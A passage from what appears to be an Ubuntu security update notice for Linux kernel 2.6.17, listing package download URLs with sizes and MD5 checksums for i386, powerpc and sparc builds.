http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    63812 241cc60afc04d861a7d947aa400d2b37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    36004 689c5c5aba993fc9e931702f3475fd01\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    36520 646c3c18fd18b4f2bbba1f38d8342d23\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   127286 04af22c9c526bd8878af771b69024ef4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   131322 ae3f531a702b22855728f15409735da7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    46806 92291f58c9629b44abb4f44aae7beaf8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:    47566 d709606c6c03b1c712e5dd837b4cbffc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   311918 e2e20b3e2ea473764b5e566ef3727bd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb\n      Size/MD5:   318712 8db371735ac5251d1ca8b97c7fdc6e84\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.41_i386.deb\n      Size/MD5: 21532894 91695ac9456aa32e4285913d16d4953f\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    23234 f44fccc1862958c73af06c97ee5d4b26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    26078 8b9e941c2ac45c4d8fd5944658f5f248\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    48586 e5477df7a5cba10af26be502f0635c21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    52028 d0052d4d1c65c5d38c1477a3bbfcc94d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:     2326 f417648675e7acfa5867ee8958495a2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:     2512 2bdc4d135a4b6ab0b7454033c56e81d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    39146 36c6d844177651c98a32a1f4de9bac47\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    43160 5cccb4d4c7a365b06ec59d94c5096b7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   111460 637701f6b21946824edc42e6a6b3566e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   122264 bec36c6b8274b8afd9d720999bc1c699\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    40398 0499fd639f86c20d0a7e60be731ff9f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    46876 be7dabfbcb0a7566e3080c3772462fd8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    28058 88db7067a260a6a08512198011679271\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    29044 f4a7eddc497b03169a44c72cf182e97a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   209728 c4f462d5a06674e080e992e32f4d6cea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   225678 ee2a0e3c443723a0ce97d8e970090f84\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    44592 f88f56ae03ae05cb79f0319eb1be4fc9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    40180 026063484d20bbe1fbd0d30fc777b102\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:     1960 ce37409736c072d6859020537f966bbb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:     2232 444d141dbf7a0be30f683008105e2454\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    79296 6202508d92e6f97f32da0d7e8f8ccb3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    86610 2c60ff37a8a70308a2a9498bc561d3af\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   110266 9be5a8cdfbc2a405112322faf498dc9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   127800 5132a88c4c447ff1fb9638e836b11010\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    55672 57b5ce26bba975e81280cb4c8ab7b76a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    61918 54a57f37db597427da88933efbfd8dc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   141126 2eee122e08fd74b2c97f5c84ab34c5e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   158554 c88ff46534673a44bf0a44cb01ab8db3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   314558 f849928c8ea52842ede21b5923e4a84c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   289932 24b2c911aba6aa8d0b519e3a71344e6f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   113202 a126ad5886c8950e1770e9cd985ba147\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   116438 16d3713f122c112c3804a247e55c84d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:  2052254 d7284aec42efb2b79d629aae36f85b95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:  2771922 717405adf1c494b10f007552ed3def99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.41_powerpc.deb\n      Size/MD5:   912460 927a75696a3c9731b40dcca42d1b1b49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.41_powerpc.deb\n      Size/MD5:   915104 b7e1aae5fdf896de9b00ffddba73d6ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.41_powerpc.deb\n      Size/MD5:   913878 d66779cfc21da3725638489f295481da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.41_powerpc.deb\n      Size/MD5:  7445508 83b0a2ec311bffc76c0c1f364c74f0ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.41_powerpc.deb\n      Size/MD5: 22721046 a3b7652ca9a89e64b17bc2b7aba45b74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.41_powerpc.deb\n      Size/MD5: 24606868 0d76b8ed91944300c917b835d79c47ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.41_powerpc.deb\n      Size/MD5: 22428258 74495ae230394d9d39fca39f7ef71967\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.41_powerpc.deb\n      Size/MD5:  2043316 f88b494bb78dad7ec7fd38038e9429a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.41_powerpc.deb\n      Size/MD5:  2590132 f5a564fba2ed0cadaad735691681f13f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.41_powerpc.deb\n      Size/MD5:  1969568 2d93ed6141d44cc0a13b3530828fc8f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_powerpc.deb\n      Size/MD5:  1730182 f90e7c905770310ff4bf91369eff5fbb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    17430 ba9deca2f2c5bc6af6922edfa3a46936\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    17362 0be7fc3d49f8003e5c1fa653d1161cb1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   258074 571823d4d6a5a59bccdec424b1a79e74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   297936 a1671c84513f9ff6c9bfec5a77516659\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   239038 7815ea92646f396243d8ddee08603f0d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   266530 e6e7d4fb571dc185f81b2d8750347fc5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:  1048482 32c385975d75dbc9881f2588eb4f83f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:  1048610 e74f5458086998989e79cc13eca6f466\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:  2098450 80794ad9682a8e960e65a65fe211069f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:  2331916 11f129cf828165f4b8653e2f6c041d0a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   233866 14d512283e6cac9b56106e3253712ebd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   214710 2ae3df298309c615f4cbb9b0c313056b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    12694 8d68131af0ff7b1265b116ab1abb69db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    13316 b38627dc99b26991cfb411f010f95ca2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    83240 a5efba2fcc50681555c30b1358a0813b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    97176 14b1ee6592d0b2037ccfac07e1fca4e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    71166 8aad18eeeec75a9fc1c14e3d764dbdfb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    84196 d90f611dc950e62436bb5465867302ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:     6348 217f6e379d7ef92f881460d04b9ae10e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:     6880 008d2e8bc16a6f3b56f47a70c2dd7c8f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    57004 e1448478824a5a6c01e0c4b51e163659\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    69202 197a76821fd4d7c0f97ba60131c20677\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   128614 c0a55e944a2493c00b7a1c2c3dc9aaed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   156242 fe908c53d51b221aef61870a5f479d0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   109768 bc43c9322049dfc8bc15af006551baff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   133044 7d49815adeecf9ca01b9821d86970335\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    86622 421ac3dc23e77ba944dc70175b8d2b55\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    94816 d2db47cfd8b715c3691099450a33411c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:  1511576 521fd9a273bd7f525ad183e587387ee5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:  1521686 284733f627766c212367d3d7aae43d4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   101308 ceffff4737228e697b3e8c18a37b908a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   115550 a632cbed2c861fc432c4550ad4aff373\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    12198 8dc73bf06c095d525f3c955ca00cd1f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    14284 a1f89acfdbb4cab89652478887aa18d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    84666 9cef62054edddca2128fddabd5f5077f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    87954 9dcd7c6d8265dee5919b110870eb0cd6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    37284 d67d4df023d3c5d683440fadaab1ee9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    40252 fe638331efa7cb659b60b9de39019291\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   140002 d27a0c7d623c67241b1b58c6ab1cf267\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   161498 653ef8786d0330bdbf47d0b8d7b2f1f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    49992 e4cf0544fe424b61fdfdbddc43f17fee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:    54866 f34dfa0f96aff8902a3ac104a4f904e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   308222 644d7e2d9b7cddcfc725bb7198d40367\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb\n      Size/MD5:   330220 d6e6e30350819826f543b35c43ebb79c\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:    50722 25643d1adb4dd6f860d836852fb30a64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:     2388 73fce6a2d5a167901d758eb79ab19de2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:    40666 2ddd42df519917694783f3331845b06b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:   112216 ed1d7424f8eda91a24c8f6a21310ae56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:    41748 3bb8746e309a474d319b43064eeb19d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:   105100 7828fa5edaedfea3c3ea817196d8bb11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:     6860 9b2747d379625a26fa7c7b9fbe79858e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:   147574 0914e75619fedf4477f90610029aa592\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:  1840680 cd1c63ff8e8686beb478b9492d0dbdb5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.41_sparc.deb\n      Size/MD5:   808630 8becdc1b19ab796fb770c747bc7ea9eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.41_sparc.deb\n      Size/MD5:   806528 8bb4779b4e8975fae3d2741992cb1539\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.41_sparc.deb\n      Size/MD5:  7424836 5ba8a5585029e847eca4be52d789b91f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.41_sparc.deb\n      Size/MD5: 15628650 e249d211bfcc2561e00d746717899c78\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.41_sparc.deb\n      Size/MD5: 15289880 a3d84efcd51a5c15be9258187cc5bfe5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.41_sparc.deb\n      Size/MD5:  2172656 dcc0f79fa168ea68ffc61a9a49acaf0b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.41_sparc.deb\n      Size/MD5:  2086564 75b33d70e4fc138a8de0ffe2fad093a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_sparc.deb\n      Size/MD5:  1813464 a727069987de8388404ab155492ce68a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:     7400 10af53789fcb4047abc533fe980f8387\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:   263978 2017f5523e1cb92d41e45ecec5355079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:   229200 ac4a91fd864a51da81b2049bb79f9171\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:  1048438 10d391b17cea2f7d8f031672f5fe0df0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:  1921954 11c18c31b7004fbddb995068e673fd4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:     9910 0f91d879eda7a5e24531c8f749187164\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:    40352 29678c338db4eea37bc72163c5c27b3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:     8718 a37ffd230a9981ab0c346401ebc30482\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:    59380 f751c8373f59c58c280d94fa86c2b828\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:   162876 389dca490f28b7f7ad9f19ded7665cd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:    66648 a454526e3ef39da43045cd246d18d39b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:   855794 e756d9e85366386c4cb3ee0b075f5d37\n    